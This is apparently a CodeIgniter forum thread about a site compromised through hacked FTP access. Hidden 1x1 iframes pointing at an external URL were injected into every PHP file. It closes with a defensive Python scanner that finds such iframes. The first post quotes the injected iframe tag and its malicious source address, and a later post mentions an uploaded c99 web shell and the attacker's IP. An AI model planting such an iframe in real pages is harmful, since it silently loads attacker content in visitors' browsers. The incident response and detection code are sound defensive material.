hacked again .. iframe injection CI 1.6.3 !!
#1

[eluser]Unknown[/eluser]
Hello everyone. My customer is running a website developed in CI version 1.6.3. Recently the website got a massive iframe injection.

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>

All the PHP files are injected with it, and new index.html files are created in each directory. Despite my shouts, the developers failed to change $config['global_xss_filtering'] = false; to true. Could that have prevented this situation?

Where should I start to find the root cause where the injection started?

Thanks
#2

[eluser]davidbehler[/eluser]
Hacked ftp access?
#3

[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]

Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.
#4

[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.

While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).

That should take care of your security concerns.
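
One way to start on the root-cause question from post #1, as an added example that is not part of any post in this thread: a Python scan of a copy of the webroot for hidden (0 or 1 pixel) iframes like the one quoted above, listing affected files oldest-modified first so the earliest timestamps can be compared with the FTP log. The function names, the sample tree and the `.example` URLs are constructed for illustration.

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
# Width/height of 0 or 1 marks a hidden frame; "heigth" is the misspelling seen in the injected tag.
TINY_RE = re.compile(rb"\b(?:width|height|heigth)\s*=\s*[\"']?[01](?:px)?[\"']?(?=[\s>/])", re.I)
SRC_RE = re.compile(rb"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXTS = (".php", ".html", ".htm", ".js")

def scan_webroot(root):
    """Return [(mtime, path, src)] for every hidden iframe, oldest modification first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            for tag in IFRAME_RE.findall(data):
                if TINY_RE.search(tag):
                    m = SRC_RE.search(tag)
                    src = m.group(1).decode("latin-1") if m else ""
                    hits.append((os.path.getmtime(path), path, src))
    return sorted(hits)

def demo():
    """Constructed sample tree: two injected files and one legitimate video embed."""
    root = tempfile.mkdtemp()
    bad = b'<iframe heigth="1" width="1" frameborder="0" src="http://injected.example/t.php"></iframe>'
    samples = {
        "index.php": (b"<?php echo 'hi'; ?>" + bad, 2000),
        "sub/index.html": (bad, 1000),
        "about.php": (b'<iframe width="560" height="315" src="http://video.example/v"></iframe>', 3000),
    }
    for rel, (body, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))  # fixed timestamps so the ordering is reproducible
    return [(int(t), os.path.relpath(p, root).replace(os.sep, "/"), s) for t, p, s in scan_webroot(root)]

if __name__ == "__main__":
    for row in demo():
        print(row)
```

Modification times can be changed by whoever wrote the files, so treat the ordering as a lead to check against the FTP and web server logs rather than as proof.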



